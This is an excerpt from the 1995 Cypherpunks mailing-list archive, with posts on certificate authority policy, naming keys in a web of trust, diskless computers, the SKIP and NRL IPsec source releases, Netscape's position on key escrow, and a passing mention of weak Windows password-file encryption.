your own name). 
 
 






From rsalz at osf.org  Wed Nov 29 06:09:51 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 29 Nov 1995 22:09:51 +0800
Subject: The future will be easy to use
Message-ID: <9511291354.AA16998@sulphur.osf.org>


>There is more to this problem than how it is that I trust the key.  There
>is also what I trust it for.  ...
>It is hard to see how to record the information about how much I trust the
>receipent's systems security.

Bingo!  This is one of the hard parts of certificate authorities; just
what are you attesting to?  The American Bar Association has a big document
for public review that addresses what this might mean; there are a couple
of RFC's that specify CA policies (one from COST in Sweden, I think), and
RSA and/or Verisign will give you their policy in hardcopy.

In x.509v3 certificates, there is an extensible field where the key-signer
can put arbitrary data.  The intent is apparently that you put the ISO
object-ID (you know, those funny 1.3.2.11.... numbers) of the policy
document.

There is, of course, no way to interpret the semantics of this electronically.
It will be interesting to see how various companies address this issue,
for example as they start to support arbitrary CA's in browsers or servers
while doing commerce over the web.
	/r$





From Alan.Pugh at internetMCI.COM  Wed Nov 29 06:30:17 1995
From: Alan.Pugh at internetMCI.COM (amp)
Date: Wed, 29 Nov 1995 22:30:17 +0800
Subject: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <01HY7L2XIX3M922UYS@MAIL-CLUSTER.PCY.MCI.NET>


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Timothy C. May           \ Internet:    (tcmay at got.net)

TM> I'm skeptical of the "Diskless Internet Box = Telephone" analogy.

TM> Folks I know who are not computer-savvy, or who have other things
TM> they'd rather be doing, are not likely, as I see it, to buy boxes
TM> that still require them to type messages to other people but that
TM> don't allow them to download and save the interesting stuff they
TM> find.

TM> The telephone appealed to those who truly wanted to "just keep
TM> talking"...that was the beauty of it. Most people don't know how to
TM> touch-type, and typing by hunting-and-pecking is painful and unnatural
TM> for most people.

i guess it kinda depends upon the epoch in which you grow up. when
telephones were first introduced, it didn't seem as natural to people
as it does for us today. i've got a copy of the encyclopedia
britanica published in 1903 that has some _facinating_ stuff on
telecommunications. (i'm in the process of scanning it in. anyone who
is interested in it can email me an i'll send it to you when i'm
done. 1903=no copyright) 

i've seen people's typing skills improve remarkedly just through
sheer repetition. i think that hunt-and-peck falls to look-and-peck
if you find yourself typing to any serious degree rather quickly.


TM> A couple of years ago "the computer for the rest of us" was said to be
TM> a pen-based Newton-type machine, now it is said to be a diskless,
TM> memory-limited "Eunuchs" machine.

unless memory becomes _real cheap_ real fast, diskless workstations
won't do. i don't see why it would be so hard for those pushing these
machines to add enough disk to make it usable and still stay cheap. 

otoh, i don't think the internet is enough of a pull for people to
want machines like this even if they did have local storage. i figure
most people want computers to do something more for them than send
e-mail. hell, i can send e-mail with a modem and dumb terminal. (been
there-done that). i think the thing that will kill this idea will be
the simple fact that people expect a computer to do more than what
those pushing this 'technology' think they do.


TM> I see a greater chance that home game machines, such as the 3DO and
Sony
TM> PlayStation machines will get Web browsers done for them than I do that
TM> people will buy machines that are so limited.

good call. i think people will soon be expecting more out of those
game machinges than they currently do. i know i sure as hell would
given the price. why can't current came machines support
telecommunications? the modem i'm using to send this message is
running on a dsp chip. i remember playing falcon-at via modem several
years ago. it was a hoot even at the bauds available then. at 14.4 or
better it would be a real hoot.

TM> The only relevance of this whole topic to Cypherpunks
TM> is....is....minimal.

same here. however, what is happening in the computer business does
have _some_ relevance to crypto as we have to see where the market is
heading. 


amp
<0003701548 at mcimail.com> (since 10/31/88)
<alan.pugh at internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 29, 1995   18:18
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLzqZ4dTfgZXlXydAQFxQgf9HY6aE53ZURtH10XrHlRggYrwK88WXtxf
GmF1Vq8Gs7kwf3E71e8hDKCMJ6BDMTded2oYZjx1gmBMImxSczTX721IzbXttAKx
H5Nm/hMAV85DdJhxexENY5Do9naf68YAklcloVr3UdTHI+KMeIbTKQdWp//s89Rx
E02ohxyHIS/ckDRo89AMzVZWYv9dpP1Ua9VKAWM0uARtCITTDfM3ZvxRE7P7FYky
xpnSHP2dobWWNIOl/4CUFmbYoOgi0nkWrEslisKJ67H/oL+8rkdts3qaKqIa/feV
gqplKYmDB97diEjjuQCbqYUqGuwnSudrcpUnV4E9DkVOFALgdRC/aA==
=9xHp
-----END PGP SIGNATURE-----






From Alan.Pugh at internetMCI.COM  Wed Nov 29 06:30:19 1995
From: Alan.Pugh at internetMCI.COM (amp)
Date: Wed, 29 Nov 1995 22:30:19 +0800
Subject: The future will be easy to use
Message-ID: <01HY7L3OU4XE922UYW@MAIL-CLUSTER.PCY.MCI.NET>


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Jack P. Starrantino      \ Internet:    (jps at monad.semcor.com)

JS> I bring nothing cypher-wise. I would be willing to help walk the
JS> s/w-engineering dog and to write Motif/X/socket if the chosen platform
JS> is UN*X, however.

JS> So, from an engineering standpoint, what should the "future" look
JS> like?

unfortunately, it appears to me that if you _really_ want encryption
to be universal, it's gotta be done on windoze, it's gotta be
point-n-click and seamless to the mail application. i would prefer it
if the masses would use a real operating system, (no o/s wars please.
i started in a mini/mainframe environment and simply don't think
dos/windoze qualify your mileage may vary), but that just ain't the
way it is. would netscape be selling at $130+ if they only wrote for
unix?

my 2 cents


amp
<0003701548 at mcimail.com> (since 10/31/88)
<alan.pugh at internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 29, 1995   17:40
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLzhU4dTfgZXlXydAQEC1gf+ImAvGk2ceQqCt8E0EC9rlFwrMgEmgkZk
E+mBd88dB8TazZn1n7oXasjc0GIjMZZCQYft9gqzuQDLQ6ceK5MpIZuREFWJq6+U
nyvq/ivkiGwB4ubZ48xG4EJS8094C+Xj4fG/zgtNVsQr0O6ln/6Q/+bt/ciqP9PZ
4gjP4VYpmiFEQ3OGW/oYevmAxdvYYRoWEfjUwmG8tHKORWo9yfDs9yJHHYo3StmX
SqM47v2F3D1r5JBgdrrIdOElwJHchU31kwk7trDs0/Ne7HWDdgIsX2MoDCW/Dwdt
SaTC3B5TVpz6G/+FvxUSRWgY5vU1sqnCT5WogqTfJRP5ohz5rt6nqQ==
=IB4/
-----END PGP SIGNATURE-----






From jsw at netscape.com  Wed Nov 29 06:42:20 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 29 Nov 1995 22:42:20 +0800
Subject: Certificate Authorities?
In-Reply-To: <199511290139.UAA02214@cmyk.warwick.com>
Message-ID: <30BBC98D.3BD3@netscape.com>


Harry S. Hawk wrote:
> As a Cypberpunk, a reporter and a corporate user of java/hot
> java/netscape not only should you do that but have a way of locking in
> various class libs..  E.g.  if I want to change the security class
> (but don't want my users to do so..) there needs to be a way.. THat
> SHOULD be in 2.0.

  This is all stuff we are looking at.  It will not be in 2.0 though.
There is a lot of functionality in 2.0 that should not have to wait
for this.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From jps at monad.semcor.com  Wed Nov 29 06:48:49 1995
From: jps at monad.semcor.com (Jack P. Starrantino)
Date: Wed, 29 Nov 1995 22:48:49 +0800
Subject: The future will be easy to use
In-Reply-To: <199511280435.UAA08732@blob.best.net>
Message-ID: <9511291431.AA14541@monad.semcor.com>


James A. Donald writes

> Specs, anyone?  > > I suggest a few requirements:  > > Store the
keys, and information about the keys in a *real* database > ...

Is this worth the complexity/cost? I'd have thought that the amount of
data involved would be small enough that index hashing would be
overkill, and I can't think of any operations that would require a full
up db engine.

Am I missing something?

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps at semcor.com
Suite C-100
Warminster, PA 18974





From joelm at eskimo.com  Wed Nov 29 06:57:16 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Wed, 29 Nov 1995 22:57:16 +0800
Subject: Microsoft weak encryption
Message-ID: <199511291447.GAA19250@mail.eskimo.com>


Peter Gutmann has an interesting article in sci.crypt, demonstrating how
weak Microsoft's encryption is with basic access control in Windows for
Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
files.  I think a t-shirt is definitely in order for this.

Anyone up for writing some bruting code?

Joel






From jcobb at ahcbsd1.ovnet.com  Wed Nov 29 07:11:43 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 29 Nov 1995 23:11:43 +0800
Subject: Encrypted Email
Message-ID: <Pine.BSD.3.91.951129094944.5117M-100000@ahcbsd1.ovnet.com>



 
Connie, 
 
 
On 11 27 95 you asked 
 
    Can anybody briefly summarize for me some options for 
    encrypting email that are secure? I know about PGP but 
    I need something for (my environment) with an easy to 
    use interface (PC-Windows) - for use by people who 
    really aren't very computer literate. 
 
 
The following item from 11 27 95 Computerworld 58 may be 
helpful: 
 
 CommTouch Software, Inc. in San Mateo, Calif., announced 
 a secure Internet E-mail package called Pronto Secure. 
 
 It allows connected and disconnected users to send and 
 encrypt Internet mail.  It supports many Internet security 
 protocols, such as Power One-Time Pad, Pretty Good Privacy, 
 Privacy Enhanced Mail, Secure Multipurpose Internet Mail 
 Extensions (S / MIME) and MIME Object Security Services. 
 
 Pronto Secure, which will ship in March, will require users 
 to replace their existing Internet mail systems....  Comm- 
 Touch plans to ship by mid-1996 a security module that is 
 Messaging Application Programming Interface-compliant and 
 works with a user's existing mail [system]. 
 
 
At p 66 of the same issue, there's a listing of "Recent in- 
formation security product announcements."  CommTouch is 
listed there; its Internet address is 
 
                     micheleb at ipri.com 
 
and a single copy of Pronto Secure is US $299 list. 
 
ipri.com = InterActive Public Relations, Inc in 'Frisco. 
 
 
Cordially, 
 
Jim 
 
  
 





From jya at pipeline.com  Wed Nov 29 07:42:20 1995
From: jya at pipeline.com (John Young)
Date: Wed, 29 Nov 1995 23:42:20 +0800
Subject: WAY_lad
Message-ID: <199511291529.KAA22826@pipe9.nyc.pipeline.com>


   11-29-95. FiTi:

   "Information highway needs rules of the road, says report."

      Pointing out the possibility of technical
      incompatibilities and trade friction if companies are
      treated differently in different markets, the report
      outlines the case for a "global regulator" within the
      structure of the new World Trade Organisation. It points
      out that issues such as intellectual property rights,
      encryption and government control on cross-ownership
      have global rather than national aspects. "Encryption,
      for example, raises tricky and emotive issues connected
      with organised crime and national security and cannot be
      treated simply as a business problem."

   No revolution for software [Editorial]

      Today's software market is the way it is not because of
      some evil conspiracy in Seattle, Microsoft's home town,
      but because it meets most consumers' interests most of
      the time. The power to set standards follows from that
      success. Changing technology widens the range of
      possible market structures, but does not affect
      customers' underlying needs and preferences. In the
      battle between the technologically possible and the
      economically attractive, economics always wins.


   WAY_lad  (7 kb)


FiTi on-line at <www.ft.com> for waylaying top article.













From jya at pipeline.com  Wed Nov 29 07:44:58 1995
From: jya at pipeline.com (John Young)
Date: Wed, 29 Nov 1995 23:44:58 +0800
Subject: NOH_ide
Message-ID: <199511291530.KAA23283@pipe9.nyc.pipeline.com>


   11-29-95. Washrag:

   "Postal Service Awards Contracts to Develop Computer
   Kiosks."

      The Postal Service predicted "more than 10,000" kiosks
      could be installed in post offices, libraries and
      shopping malls "within the next few years." The Postal
      Service is the lead government agency on the project,
      one of several administration initiatives designed to
      provide the public with computer access to government
      information.

   "CIA, Pentagon Back NIMA 'Concept' Combining Spy Satellite
   Photo Units."

      The Pentagon and the CIA announced an agreement
      yesterday endorsing the "concept" of consolidating eight
      defense and intelligence agencies -- those responsible
      for managing spy satellite photos and related tasks --
      into a new National Imagery and Mapping Agency.

   NOH_ide  (10 kb)













From perry at piermont.com  Wed Nov 29 07:49:18 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 23:49:18 +0800
Subject: SKIP Source Release is out!
In-Reply-To: <9511290122.AA26147@monster.incog.com>
Message-ID: <199511291534.KAA02780@jekyll.piermont.com>



Tom Markson writes:
> Check out http://skip.incog.com.  We've released the source to the SKIP
> key management and IP layer encryption package for SunOs 4.x.

SKIP is a non-standard being pushed by Sun.

Admittedly, it is available for FTP. However, thats just because I
don't have an FTP site for the NRL IPsec + IPv6 stuff.

Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
implementation up for FTP is invited to get in touch. It will runs on
4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
pretty portable to other similar Berkeley based machines.

It won't "run out of the box" on NetBSD as it stands -- I should have
it nicely packaged up to do that before the end of the week.


Perry





From adam at lighthouse.homeport.org  Wed Nov 29 08:08:09 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 30 Nov 1995 00:08:09 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511291558.KAA15623@homeport.org>


> > >Can you imagine??  I'm simply not willing to fool myself into thinking 
> > >that I ahve security by posting a key and using PGP.
> > 
> > Unless you can post some proof that PGP is insecure, stop insisting it is.
> 
> PGP is really not the issue.  The issue is more my security and the
> environment that I use PGP in.  I don't have a trusted machine to run PGP
> on.  Anyone who wants to can come up to machine and copy my secret keyring
> or they can even watch me typing my password in. 

	Threat, please??  Do people often stand over your shoulder as
you type?  Enter your office, point guns at you, and take a backup of
your entire computer?  Have you considered putting the secret keyring
on a floppy and locking it in your desk/safe when you're not actually
in the office? (Or home..)

> So, I don't fool myself, and I don't use PGP, except for things like
> exchanging a one-time pad with someone when I've already sent the message
> out across another delivery mechanism, like on a floppy delivered my
> courier. 

	I don't follow.  You're claiming that PGP is good enough to
transfer OTPads, but not good enough to sign pseudononymous messages?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From perry at piermont.com  Wed Nov 29 08:11:09 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 00:11:09 +0800
Subject: The future will be easy to use
In-Reply-To: <Pine.BSD.3.91.951129093109.12710F-100000@usr1.primenet.com>
Message-ID: <199511291555.KAA02851@jekyll.piermont.com>



attila writes:
> 
>    what about the Sun release announced today? --it is fully functional
> with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
> or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
> key management and IP layer encryption package for SunOs 4.x. 

Ah, yes. The non-standard from Sun.

It doesn't do D-H negotiation, by the way. It uses something I'd call
inferior. Read the flames in ipsec and ipsec-dev for details.

.pm





From adam at lighthouse.homeport.org  Wed Nov 29 08:17:48 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 30 Nov 1995 00:17:48 +0800
Subject: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <199511291559.KAA15633@homeport.org>


Joel McNamara wrote:

| Peter Gutmann has an interesting article in sci.crypt, demonstrating how
| weak Microsoft's encryption is with basic access control in Windows for
| Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
| shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
| files.  I think a t-shirt is definitely in order for this.

	While Peter did a nice job of showing how Windows stores
passwords, my understanding is that those passwords are decrypted by
Windows, and sent over the net in the clear.  Seems much easier to
snarf them there..

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cme at TIS.COM  Wed Nov 29 08:22:11 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 30 Nov 1995 00:22:11 +0800
Subject: The future will be easy to use
In-Reply-To: <199511290659.WAA19886@blob.best.net>
Message-ID: <9511291555.AA25090@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 22:57:25 -0800
>From: "James A. Donald" <jamesd at echeque.com>
>
>At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>>That's true.  What the user would have to see is some icon (or, for
>>text-bound folks, a temporary unique string) until the user chooses and
>>assigns the appropriate alias.  That icon would have no meaning by itself.
>>It would acquire a meaning by being associated with some message or set of
>>messages:
>
>Better method:  Creator of the key names it:  Usually after himself or
>his role:  The recipients key database detects and resolves cases 
>where two different keys have identical names in accordance with
>certification rules.

That's today's method, more or less.  It doesn't address my needs.  The
name you pick for your key may or may not mean anything to me.  It might be
pronounceable, giving it some advantage over a radix-64 string, but it
might also be non-unique, making it worthless as an identifier.

What means something to me is whatever name (or symbol) I assign to the
person behind the key in question.  That's the one in my mind and therefore
the only one of interest to me.  You, however, don't know what's in my
mind.  You don't even know my preferred symbol set.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyCVlQXJENzYr45AQEqEQP+O23i/6bcPX60i249150mv39WdoO0sL1w
pUtiZRs2PLACYTMA+DVP28upD4HRrk3/5Vd76EojPm5R8P/DWP190CccRo0t4xZ4
fM1kqEanvw1unV3Kd37ZjhD7tme5oN/v0ipjB2ETsrnowJnZ8HYhiF+WClK5ShhD
gEAg71NQux8=
=RyHR
-----END PGP SIGNATURE-----





From smithmi at dev.prodigy.com  Wed Nov 29 08:27:40 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Thu, 30 Nov 1995 00:27:40 +0800
Subject: SKIP Source Release is out!
Message-ID: <199511291606.LAA30779@tinman.dev.prodigy.com>


Perry Metzger writes:

>Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
>implementation up for FTP is invited to get in touch. It will runs on
>4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
>pretty portable to other similar Berkeley based machines.

What licensing requirements exist for people who might want to 
use this code in their products? In particular, does one need to 
obtain any licensing from RSA or Cylink? 

--Michael Smith
  smithmi at dev.prodigy.com

 






From perry at piermont.com  Wed Nov 29 08:34:52 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 00:34:52 +0800
Subject: SKIP Source Release is out!
In-Reply-To: <199511291606.LAA30779@tinman.dev.prodigy.com>
Message-ID: <199511291612.LAA02926@jekyll.piermont.com>



Michael Smith writes:
> Perry Metzger writes:
> 
> >Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
> >implementation up for FTP is invited to get in touch. It will runs on
> >4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
> >pretty portable to other similar Berkeley based machines.
> 
> What licensing requirements exist for people who might want to 
> use this code in their products? In particular, does one need to 
> obtain any licensing from RSA or Cylink? 

No. It doesn't contain any public key stuff because it isn't the key
management component.

Its all available under a Berkeley style license, which permits
unrestricted commercial use, and complies with RFC 1825, 1826, 1827,
1828 & 1829.

Perry





From mark at unicorn.com  Wed Nov 29 08:38:57 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Thu, 30 Nov 1995 00:38:57 +0800
Subject: The future will be easy to use (fwd)
Message-ID: <Pine.3.89.9511291640.A7225-0100000@unicorn.com>


On Tue, 28 Nov 1995, Patiwat Panurach wrote:

> I feel sad when they say that the market for <1000 $ machines is nill, I 
> had so much fun and learned so much from my old machines.

Personally, I just bought a 486/66 laptop, which would have cost almost 
$1000 with 170 MB hard disk, 4 MB of RAM and Linux (I paid a couple of
hundred extra for a 500 MB disk)... I could have got a Pentium desktop
for the same price if I'd wanted one. So I don't see that there's really a
great advantage to a $ 500 diskless computer (and having worked on Sun
3/50s in the past, I know about all the disadvantages). 

ObCrypto/Security: My landlord bought himself a computer a couple of weeks
ago after he'd lived without them for over forty years, and has been
enthusing about how easy it makes it for him to do his accounts. He just
read about these diskless machines in a magazine, and his first reaction
was that there was no way he'd keep his accounts information on a remote
server. Obviously people *are* more privacy-aware than they're often given
credit for. 

	Mark






From sameer at c2.org  Wed Nov 29 08:58:53 1995
From: sameer at c2.org (sameer)
Date: Thu, 30 Nov 1995 00:58:53 +0800
Subject: ecash casino
Message-ID: <199511291640.IAA28114@infinity.c2.org>


	Any enterprising cypherpunks in gambling-friendly
jurisdictions interested? I figure it would make ecash take off.. and
you'd get rich.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From jsw at netscape.com  Thu Nov 30 01:00:08 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 30 Nov 95 01:00:08 PST
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <30BD716E.5F69@netscape.com>


sameer wrote:
> 
> http://www.cnet.com/Central/News/govt.html
> 
>         Bad. Very Bad. And I was almost starting to like Netscape.

  Please don't give up on us yet.  All press accounts I've read so far
have lots of stuff attributed to Jim, but very little of it is actual
quotes.  There appears to be lots of paraphrasing and interpretation
being done on the part of the reporters.  The impression that I'm
getting is that the press has blown a couple of small sound bites
way out of proportion.  The infoworld article that covers the same
speech only devotes about 20% of the article to the key escrow topic,
and is similarly devoid of actual quotes.

  I have not spoken to Jim about this, and I did not hear the talk
myself, so I'm mostly reading between the lines here.  After I saw the
story earlier today I started asking around to see if the company
had made any major policy shift in the direction of GAK, and wasn't
able to turn up anything.  If anything its the opposite.

  My feelings about key escrow, which were echo'd by several folks
in management when I spoke to them today are:

	o Government mandated escrow would be a bad thing
	o There are some settings where escrow is good, in the corporate
		setting, or as a matter of person choice(to protect against
		loss of password)
	o The whole issue of escrow should be de-coupled from the
		export issue

  I don't want to go down in history as a facilitator of the totalitarian
state, and I don't think anyone else here does either.  I hope folks
wait for press releases, product announcements, etc. before condemning us
too much.  Jim has made comments in the past that were quoted out of
context, and blown way out of proportion to the point that some people
believed that we were monitoring our user's every keystroke and sending
it all back to the home office to generate huge demographic databases.
I suspect that this is the same sort of thing, and I hope everyone will
judge us by what we do.

	--Jeff

PS - you won't find a LEF in the soon to be released SSL Version 3 spec...

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From cme at TIS.COM  Wed Nov 29 09:04:48 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 30 Nov 1995 01:04:48 +0800
Subject: The future will be easy to use
In-Reply-To: <199511290707.XAA24211@blob.best.net>
Message-ID: <9511291629.AA28948@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 23:05:29 -0800
>From: "James A. Donald" <jamesd at echeque.com>
>
>At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
>> Of course.  This isn't the base case.  We would have some keys which I sign
>> based on my own personal knowledge; things handed to me by people I know;
>> some possibly published in the paper where the real key owner would see the
>> claim and be able to contest it.
>
>You are making the same erroneous assumption that Phil made when he
>designed the Web of trust:  You assume that it is important and 
>interesting to link key ID's to physical bodies.  

Thanks for that reminder.  I am actually not bound to the notion of keys
being only for people.  I'm a defender of the rights of disembodied
processes from way back :-).  However, this particular discussion was
focussed on people.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyKOVQXJENzYr45AQEzdAP/WcAaOE8RsxvNCnY0MBY0aqVboWPKU7aj
toairhNM7i5J+vacN30tBefU51+gmhQIdP3jRuArbSr0+xdrtNqiWBAiYaxiZz4X
g2/nUui2uaPuXF0tdXlN4ILSJQ0QV42mppOBXWjimcWXRioSQVBGxGS7X1tsPF+/
5AvEQha4h4I=
=MVIQ
-----END PGP SIGNATURE-----





From cme at TIS.COM  Wed Nov 29 09:07:15 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 30 Nov 1995 01:07:15 +0800
Subject: The future will be easy to use
In-Reply-To: <199511290808.AAA14767@netcom2.netcom.com>
Message-ID: <9511291640.AA00683@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 29 Nov 1995 00:10:16 -0800
>From: frantz at netcom.com (Bill Frantz)

>It is hard to see how to record the information about how much I trust the
>receipent's systems security.

I don't see a computer-understandable way to do that either -- but you have
provided an example of a human-readable way in your prior paragraph:

>			     I just added a key to my key ring that I will
>use for sending confidental data to a client site.  I trust that no one can
>access the secret key who is not also inside their firewall.  However, the
>key is on a multi-user system, so I do not trust that it is accessable to
>only one person.  Since the data I intend to send will be publicly
>available inside the firewall, I don't have to trust more than the
>firewall.

You could sign a small message consisting of:

	a) that paragraph
	b) the subject public key (or its good-enough hash)
	c) your public key (or its good-enough hash)

with your key and let that attribute declaration do the job.  It would only
be humans who could interpret it, but in the end it's humans who need to.
The computer should be able to find and use (b) and (c) -- but leave the
human to interpret (a).

I grant that they'd rather let the machine do the thinking for them, but
that may not be possible -- especially at this time in the evolution of
generally available security, before we learn patterns to codify in
computer-understandable abbreviations.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyM7FQXJENzYr45AQGErQP/QlElHIH2/tqbWtUR+hTyRUgTTEAsq18O
c9XbJ3OK+HW4WOmsxBQKgqx+/C0zsboo088rkqahG2UNLbC91iizVuAlU5zZth19
F49AAfCrnqDPMyBr+3VecAnHxj09AK5GeHiLQqepHvuyh0IN3hq44zKmeHkV3PHO
b8fPQ3tTJCk=
=K2WN
-----END PGP SIGNATURE-----





From jamesd at echeque.com  Wed Nov 29 09:09:34 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 1995 01:09:34 +0800
Subject: Elliptic curves, patent status?
Message-ID: <199511291651.IAA20813@blob.best.net>



At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
> > > I'm unclear about the patent status of elliptic curve 
> > > systems. Are they covered by the Diffie-Hellman patent? 
> > > That is, is the lnguage of this patent broad enough to 
> > > cover _all_ public-key systems, regardless of their 
> > > mathematical basis? 

On Mon, 27 Nov 1995 23:16:10 -0800 jamesd at echeque.com wrote:
> > No, but RSA will litigate you with the objective of
> > inflicting extravagant legal costs regardless.

At 08:13 AM 11/29/95 EST, Dan Bailey wrote:
> Does the patent create any headaches for elliptic curve research or
> publishing elliptic curve papers, or just for new products?

Patents do not prohibit research -- Yet.

Patent law continues to be extravagantly re interpreted from time to
time, in a way that continually increases the power of the patent
office and the power of the courts, but this creativity has not 
yet collided drastically with freedom of speech.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Wed Nov 29 09:34:57 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 1995 01:34:57 +0800
Subject: The future will be easy to use
Message-ID: <199511291715.JAA04804@blob.best.net>





>>At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>>>That's true.  What the user would have to see is some icon (or, for
>>>text-bound folks, a temporary unique string) until the user chooses and
>>>assigns the appropriate alias.  That icon would have no meaning by itself.
>>>It would acquire a meaning by being associated with some message or set of
>>>messages:

James A. Donald" <jamesd at echeque.com>
>>Better method:  Creator of the key names it

At 10:55 AM 11/29/95 EST, Carl Ellison wrote:
> it
> might also be non-unique, making it worthless as an identifier.

Then your database should detect this non uniqueness, and qualify
the displayed name with additional information, preferably additional
information that helps you address the question of "Is this the
same identity who has changed his key, or is it an accidental
collision, or is it a malevolent spoof?"

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Wed Nov 29 09:35:45 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 1995 01:35:45 +0800
Subject: The future will be easy to use
Message-ID: <199511291715.JAA04769@blob.best.net>



>James A. Donald writes

>> Specs, anyone?  > > I suggest a few requirements:  > > Store the
>keys, and information about the keys in a *real* database > ...

At 09:31 AM 11/29/95 -0500, Jack P. Starrantino wrote:
> Is this worth the complexity/cost? I'd have thought that the amount of
> data involved would be small enough that index hashing would be
> overkill, and I can't think of any operations that would require a full
> up db engine.

I think you envisage communicating with a few other revolutionaries,
drug trafficers, etc, whereas I envisage a future where every man is
his own bank and his own credit rating agency.

More immediately, any extension to the web of trust to enable it to
function for anything more interesting and important than
logical-to-physical identity (and who gives a tinkers damn about
logical-to-physical identity) will require a real database, or
will be painful without a real database.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






